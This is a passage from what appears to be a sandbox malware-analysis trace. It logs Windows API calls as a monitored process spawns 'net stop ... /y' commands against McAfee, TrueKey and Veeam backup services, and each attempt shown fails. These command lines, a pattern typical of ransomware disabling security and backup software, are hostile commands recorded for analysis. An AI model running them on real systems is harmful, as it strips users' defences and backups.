returned -1 [0201.535] _wcsicmp (_String1="pause", _String2="McAfeeFrameworkMcAfeeFramework") returned 3 [0201.535] _wcsicmp (_String1="session", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="sessions", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="sess", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="share", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="start", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="stats", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="statistics", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="stop", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="time", _String2="McAfeeFrameworkMcAfeeFramework") returned 7 [0201.535] _wcsicmp (_String1="user", _String2="McAfeeFrameworkMcAfeeFramework") returned 8 [0201.535] _wcsicmp (_String1="users", _String2="McAfeeFrameworkMcAfeeFramework") returned 8 [0201.535] _wcsicmp (_String1="msg", _String2="McAfeeFrameworkMcAfeeFramework") returned 16 [0201.535] _wcsicmp (_String1="messenger", _String2="McAfeeFrameworkMcAfeeFramework") returned 2 [0201.535] _wcsicmp (_String1="receiver", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0201.535] _wcsicmp (_String1="rcv", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0201.535] _wcsicmp (_String1="netpopup", _String2="McAfeeFrameworkMcAfeeFramework") returned 1 [0201.535] _wcsicmp (_String1="redirector", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0201.535] _wcsicmp (_String1="redir", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0201.535] _wcsicmp (_String1="rdr", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0201.535] _wcsicmp (_String1="workstation", _String2="McAfeeFrameworkMcAfeeFramework") returned 10 [0201.535] _wcsicmp (_String1="work", _String2="McAfeeFrameworkMcAfeeFramework") returned 10 [0201.535] _wcsicmp (_String1="wksta", _String2="McAfeeFrameworkMcAfeeFramework") returned 10 [0201.535] _wcsicmp (_String1="prdr", _String2="McAfeeFrameworkMcAfeeFramework") returned 3 [0201.535] _wcsicmp (_String1="devrdr", _String2="McAfeeFrameworkMcAfeeFramework") returned -9 [0201.535] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeFrameworkMcAfeeFramework") returned -1 [0201.535] _wcsicmp (_String1="server", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="svr", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="srv", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0201.535] _wcsicmp (_String1="lanmanserver", _String2="McAfeeFrameworkMcAfeeFramework") returned -1 [0201.535] _wcsicmp (_String1="alerter", _String2="McAfeeFrameworkMcAfeeFramework") returned -12 [0201.536] _wcsicmp (_String1="netlogon", _String2="McAfeeFrameworkMcAfeeFramework") returned 1 [0201.536] _wcsupr (in: _String="McAfeeFrameworkMcAfeeFramework" | out: _String="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned="MCAFEEFRAMEWORKMCAFEEFRAMEWORK" [0201.536] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5f5528 [0201.538] GetServiceKeyNameW (in: hSCManager=0x5f5528, lpDisplayName="MCAFEEFRAMEWORKMCAFEEFRAMEWORK", lpServiceName=0x30aaf0, lpcchBuffer=0xcfdbc | out: lpServiceName="", lpcchBuffer=0xcfdbc) returned 0 [0201.539] _wcsicmp (_String1="msg", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 16 [0201.539] _wcsicmp (_String1="messenger", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 2 [0201.539] _wcsicmp (_String1="receiver", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0201.539] _wcsicmp (_String1="rcv", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0201.539] _wcsicmp (_String1="redirector", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0201.539] _wcsicmp (_String1="redir", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0201.539] _wcsicmp (_String1="rdr", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0201.539] _wcsicmp (_String1="workstation", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 10 [0201.539] _wcsicmp (_String1="work", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 10 [0201.539] _wcsicmp (_String1="wksta", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 10 [0201.539] _wcsicmp (_String1="prdr", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 3 [0201.539] _wcsicmp (_String1="devrdr", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned -9 [0201.539] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned -1 [0201.539] _wcsicmp (_String1="server", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 6 [0201.539] _wcsicmp (_String1="svr", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 6 [0201.539] _wcsicmp (_String1="srv", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 6 [0201.539] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned -1 [0201.539] _wcsicmp (_String1="alerter", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned -12 [0201.539] _wcsicmp (_String1="netlogon", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 1 [0201.540] NetServiceControl (in: servername=0x0, service="MCAFEEFRAMEWORKMCAFEEFRAMEWORK", opcode=0x0, arg=0x0, bufptr=0xcfdb8 | out: bufptr=0xcfdb8) returned 0x889 [0201.540] wcscpy_s (in: _Destination=0x30a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0201.540] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0201.541] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x30b338, nSize=0x800, Arguments=0x309dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0201.542] GetFileType (hFile=0x26c) returned 0x3 [0201.542] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5f4058 [0201.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5f4058, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0201.542] WriteFile (in: hFile=0x26c, lpBuffer=0x5f4058, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xcfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfcf8, lpOverlapped=0x0) returned 0 [0201.542] LocalFree (hMem=0x5f4058) returned 0x0 [0201.542] GetFileType (hFile=0x26c) returned 0x3 [0201.542] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5f6308 [0201.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5f6308, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n_", lpUsedDefaultChar=0x0) returned 2 [0201.542] WriteFile (in: hFile=0x26c, lpBuffer=0x5f6308, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfcf8, lpOverlapped=0x0) returned 0 [0201.542] LocalFree (hMem=0x5f6308) returned 0x0 [0201.542] _ultow (in: _Dest=0x889, _Radix=851240 | out: _Dest=0x889) returned="2185" [0201.542] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x30b338, nSize=0x800, Arguments=0x309dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0201.543] GetFileType (hFile=0x26c) returned 0x3 [0201.543] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5f6308 [0201.543] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5f6308, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n", lpUsedDefaultChar=0x0) returned 52 [0201.543] WriteFile (in: hFile=0x26c, lpBuffer=0x5f6308, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xcfd04, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfd04, lpOverlapped=0x0) returned 0 [0201.543] LocalFree (hMem=0x5f6308) returned 0x0 [0201.543] GetFileType (hFile=0x26c) returned 0x3 [0201.543] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5f6308 [0201.543] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5f6308, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n_", lpUsedDefaultChar=0x0) returned 2 [0201.543] WriteFile (in: hFile=0x26c, lpBuffer=0x5f6308, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcfd04, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfd04, lpOverlapped=0x0) returned 0 [0201.543] LocalFree (hMem=0x5f6308) returned 0x0 [0201.543] NetApiBufferFree (Buffer=0x5f1ca8) returned 0x0 [0201.544] NetApiBufferFree (Buffer=0x5f1cc0) returned 0x0 [0201.544] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFrameworkMcAfeeFramework /y" [0201.544] exit (_Code=2) Process: id = "182" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x128b000" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop TrueKey /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 355 os_tid = 0xa5c Process: id = "183" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6c116000" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "182" os_parent_pid = "0xa74" cmd_line = "C:\\Windows\\system32\\net1 stop TrueKey /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 356 os_tid = 0xa80 [0201.706] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26ff3c | out: lpSystemTimeAsFileTime=0x26ff3c*(dwLowDateTime=0x4169fb80, dwHighDateTime=0x1d57a87)) [0201.706] GetCurrentProcessId () returned 0xa88 [0201.706] GetCurrentThreadId () returned 0xa80 [0201.706] GetTickCount () returned 0x116c0ff [0201.706] QueryPerformanceCounter (in: lpPerformanceCount=0x26ff34 | out: lpPerformanceCount=0x26ff34*=32199100956) returned 1 [0201.707] GetModuleHandleA (lpModuleName=0x0) returned 0x2d0000 [0201.707] __set_app_type (_Type=0x1) [0201.707] __p__fmode () returned 0x74eb31f4 [0201.707] __p__commode () returned 0x74eb31fc [0201.707] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2dffe6) returned 0x0 [0201.707] __getmainargs (in: _Argc=0x2e9064, _Argv=0x2e906c, _Env=0x2e9068, _DoWildCard=0, _StartInfo=0x2e9024 | out: _Argc=0x2e9064, _Argv=0x2e906c, _Env=0x2e9068) returned 0 [0201.707] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.707] GetConsoleOutputCP () returned 0x1b5 [0201.712] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2e9080 | out: lpCPInfo=0x2e9080) returned 1 [0201.712] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.716] sprintf_s (in: _DstBuf=0x26fef4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0201.716] setlocale (category=0, locale=".437") returned="English_United States.437" [0201.718] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0201.718] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0201.718] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKey /y" [0201.718] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fcc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0201.718] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x62) returned 0x433c00 [0201.718] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0201.718] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26fec4 | out: Buffer=0x26fec4*=0x431c60) returned 0x0 [0201.718] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26fec4 | out: Buffer=0x26fec4*=0x431c78) returned 0x0 [0201.718] _fileno (_File=0x74eb2900) returned -2 [0201.718] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0201.719] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0201.719] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0201.719] _wcsicmp (_String1="config", _String2="stop") returned -16 [0201.719] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0201.719] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0201.719] _wcsicmp (_String1="file", _String2="stop") returned -13 [0201.719] _wcsicmp (_String1="files", _String2="stop") returned -13 [0201.719] _wcsicmp (_String1="group", _String2="stop") returned -12 [0201.719] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0201.719] _wcsicmp (_String1="help", _String2="stop") returned -11 [0201.719] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0201.719] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0201.719] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0201.719] _wcsicmp (_String1="session", _String2="stop") returned -15 [0201.719] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0201.719] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0201.719] _wcsicmp (_String1="share", _String2="stop") returned -12 [0201.719] _wcsicmp (_String1="start", _String2="stop") returned -14 [0201.719] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0201.719] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0201.719] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0201.719] _wcsicmp (_String1="accounts", _String2="TrueKey") returned -19 [0201.719] _wcsicmp (_String1="computer", _String2="TrueKey") returned -17 [0201.719] _wcsicmp (_String1="config", _String2="TrueKey") returned -17 [0201.719] _wcsicmp (_String1="continue", _String2="TrueKey") returned -17 [0201.719] _wcsicmp (_String1="cont", _String2="TrueKey") returned -17 [0201.719] _wcsicmp (_String1="file", _String2="TrueKey") returned -14 [0201.719] _wcsicmp (_String1="files", _String2="TrueKey") returned -14 [0201.719] _wcsicmp (_String1="group", _String2="TrueKey") returned -13 [0201.719] _wcsicmp (_String1="groups", _String2="TrueKey") returned -13 [0201.719] _wcsicmp (_String1="help", _String2="TrueKey") returned -12 [0201.719] _wcsicmp (_String1="helpmsg", _String2="TrueKey") returned -12 [0201.719] _wcsicmp (_String1="localgroup", _String2="TrueKey") returned -8 [0201.719] _wcsicmp (_String1="pause", _String2="TrueKey") returned -4 [0201.719] _wcsicmp (_String1="session", _String2="TrueKey") returned -1 [0201.719] _wcsicmp (_String1="sessions", _String2="TrueKey") returned -1 [0201.719] _wcsicmp (_String1="sess", _String2="TrueKey") returned -1 [0201.720] _wcsicmp (_String1="share", _String2="TrueKey") returned -1 [0201.720] _wcsicmp (_String1="start", _String2="TrueKey") returned -1 [0201.720] _wcsicmp (_String1="stats", _String2="TrueKey") returned -1 [0201.720] _wcsicmp (_String1="statistics", _String2="TrueKey") returned -1 [0201.720] _wcsicmp (_String1="stop", _String2="TrueKey") returned -1 [0201.720] _wcsicmp (_String1="time", _String2="TrueKey") returned -9 [0201.720] _wcsicmp (_String1="user", _String2="TrueKey") returned 1 [0201.720] _wcsicmp (_String1="users", _String2="TrueKey") returned 1 [0201.720] _wcsicmp (_String1="msg", _String2="TrueKey") returned -7 [0201.720] _wcsicmp (_String1="messenger", _String2="TrueKey") returned -7 [0201.720] _wcsicmp (_String1="receiver", _String2="TrueKey") returned -2 [0201.720] _wcsicmp (_String1="rcv", _String2="TrueKey") returned -2 [0201.720] _wcsicmp (_String1="netpopup", _String2="TrueKey") returned -6 [0201.720] _wcsicmp (_String1="redirector", _String2="TrueKey") returned -2 [0201.720] _wcsicmp (_String1="redir", _String2="TrueKey") returned -2 [0201.720] _wcsicmp (_String1="rdr", _String2="TrueKey") returned -2 [0201.720] _wcsicmp (_String1="workstation", _String2="TrueKey") returned 3 [0201.720] _wcsicmp (_String1="work", _String2="TrueKey") returned 3 [0201.720] _wcsicmp (_String1="wksta", _String2="TrueKey") returned 3 [0201.720] _wcsicmp (_String1="prdr", _String2="TrueKey") returned -4 [0201.720] _wcsicmp (_String1="devrdr", _String2="TrueKey") returned -16 [0201.720] _wcsicmp (_String1="lanmanworkstation", _String2="TrueKey") returned -8 [0201.720] _wcsicmp (_String1="server", _String2="TrueKey") returned -1 [0201.720] _wcsicmp (_String1="svr", _String2="TrueKey") returned -1 [0201.720] _wcsicmp (_String1="srv", _String2="TrueKey") returned -1 [0201.720] _wcsicmp (_String1="lanmanserver", _String2="TrueKey") returned -8 [0201.720] _wcsicmp (_String1="alerter", _String2="TrueKey") returned -19 [0201.720] _wcsicmp (_String1="netlogon", _String2="TrueKey") returned -6 [0201.720] _wcsupr (in: _String="TrueKey" | out: _String="TRUEKEY") returned="TRUEKEY" [0201.720] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4354b8 [0201.723] GetServiceKeyNameW (in: hSCManager=0x4354b8, lpDisplayName="TRUEKEY", lpServiceName=0x2eaaf0, lpcchBuffer=0x26fe60 | out: lpServiceName="", lpcchBuffer=0x26fe60) returned 0 [0201.724] _wcsicmp (_String1="msg", _String2="TRUEKEY") returned -7 [0201.724] _wcsicmp (_String1="messenger", _String2="TRUEKEY") returned -7 [0201.724] _wcsicmp (_String1="receiver", _String2="TRUEKEY") returned -2 [0201.724] _wcsicmp (_String1="rcv", _String2="TRUEKEY") returned -2 [0201.724] _wcsicmp (_String1="redirector", _String2="TRUEKEY") returned -2 [0201.724] _wcsicmp (_String1="redir", _String2="TRUEKEY") returned -2 [0201.724] _wcsicmp (_String1="rdr", _String2="TRUEKEY") returned -2 [0201.724] _wcsicmp (_String1="workstation", _String2="TRUEKEY") returned 3 [0201.724] _wcsicmp (_String1="work", _String2="TRUEKEY") returned 3 [0201.724] _wcsicmp (_String1="wksta", _String2="TRUEKEY") returned 3 [0201.724] _wcsicmp (_String1="prdr", _String2="TRUEKEY") returned -4 [0201.724] _wcsicmp (_String1="devrdr", _String2="TRUEKEY") returned -16 [0201.724] _wcsicmp (_String1="lanmanworkstation", _String2="TRUEKEY") returned -8 [0201.724] _wcsicmp (_String1="server", _String2="TRUEKEY") returned -1 [0201.724] _wcsicmp (_String1="svr", _String2="TRUEKEY") returned -1 [0201.724] _wcsicmp (_String1="srv", _String2="TRUEKEY") returned -1 [0201.724] _wcsicmp (_String1="lanmanserver", _String2="TRUEKEY") returned -8 [0201.724] _wcsicmp (_String1="alerter", _String2="TRUEKEY") returned -19 [0201.724] _wcsicmp (_String1="netlogon", _String2="TRUEKEY") returned -6 [0201.724] NetServiceControl (in: servername=0x0, service="TRUEKEY", opcode=0x0, arg=0x0, bufptr=0x26fe5c | out: bufptr=0x26fe5c) returned 0x889 [0201.725] wcscpy_s (in: _Destination=0x2ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0201.725] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0201.726] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x2eb338, nSize=0x800, Arguments=0x2e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0201.727] GetFileType (hFile=0x26c) returned 0x3 [0201.727] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x433fe8 [0201.727] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x433fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0201.727] WriteFile (in: hFile=0x26c, lpBuffer=0x433fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x26fd9c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26fd9c, lpOverlapped=0x0) returned 0 [0201.727] LocalFree (hMem=0x433fe8) returned 0x0 [0201.727] GetFileType (hFile=0x26c) returned 0x3 [0201.727] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x436290 [0201.727] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x436290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nC", lpUsedDefaultChar=0x0) returned 2 [0201.727] WriteFile (in: hFile=0x26c, lpBuffer=0x436290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26fd9c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26fd9c, lpOverlapped=0x0) returned 0 [0201.728] LocalFree (hMem=0x436290) returned 0x0 [0201.728] _ultow (in: _Dest=0x889, _Radix=2555340 | out: _Dest=0x889) returned="2185" [0201.728] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x2eb338, nSize=0x800, Arguments=0x2e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0201.728] GetFileType (hFile=0x26c) returned 0x3 [0201.728] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x436290 [0201.728] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x436290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0201.728] WriteFile (in: hFile=0x26c, lpBuffer=0x436290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x26fda8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26fda8, lpOverlapped=0x0) returned 0 [0201.728] LocalFree (hMem=0x436290) returned 0x0 [0201.728] GetFileType (hFile=0x26c) returned 0x3 [0201.728] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x436290 [0201.728] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x436290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nC", lpUsedDefaultChar=0x0) returned 2 [0201.728] WriteFile (in: hFile=0x26c, lpBuffer=0x436290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26fda8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26fda8, lpOverlapped=0x0) returned 0 [0201.728] LocalFree (hMem=0x436290) returned 0x0 [0201.729] NetApiBufferFree (Buffer=0x431c60) returned 0x0 [0201.729] NetApiBufferFree (Buffer=0x431c78) returned 0x0 [0201.729] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKey /y" [0201.729] exit (_Code=2) Process: id = "184" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6db90000" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamMountSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 357 os_tid = 0xa6c Process: id = "185" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5fdcb000" os_pid = "0xa38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "184" os_parent_pid = "0xa84" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamMountSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 358 os_tid = 0x768 [0201.868] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17fa2c | out: lpSystemTimeAsFileTime=0x17fa2c*(dwLowDateTime=0x41842aa0, dwHighDateTime=0x1d57a87)) [0201.868] GetCurrentProcessId () returned 0xa38 [0201.868] GetCurrentThreadId () returned 0x768 [0201.868] GetTickCount () returned 0x116c1aa [0201.868] QueryPerformanceCounter (in: lpPerformanceCount=0x17fa24 | out: lpPerformanceCount=0x17fa24*=32215257722) returned 1 [0201.868] GetModuleHandleA (lpModuleName=0x0) returned 0x480000 [0201.868] __set_app_type (_Type=0x1) [0201.868] __p__fmode () returned 0x74eb31f4 [0201.868] __p__commode () returned 0x74eb31fc [0201.868] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x48ffe6) returned 0x0 [0201.869] __getmainargs (in: _Argc=0x499064, _Argv=0x49906c, _Env=0x499068, _DoWildCard=0, _StartInfo=0x499024 | out: _Argc=0x499064, _Argv=0x49906c, _Env=0x499068) returned 0 [0201.869] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.869] GetConsoleOutputCP () returned 0x1b5 [0201.869] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x499080 | out: lpCPInfo=0x499080) returned 1 [0201.869] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.872] sprintf_s (in: _DstBuf=0x17f9e4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0201.872] setlocale (category=0, locale=".437") returned="English_United States.437" [0201.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0201.874] 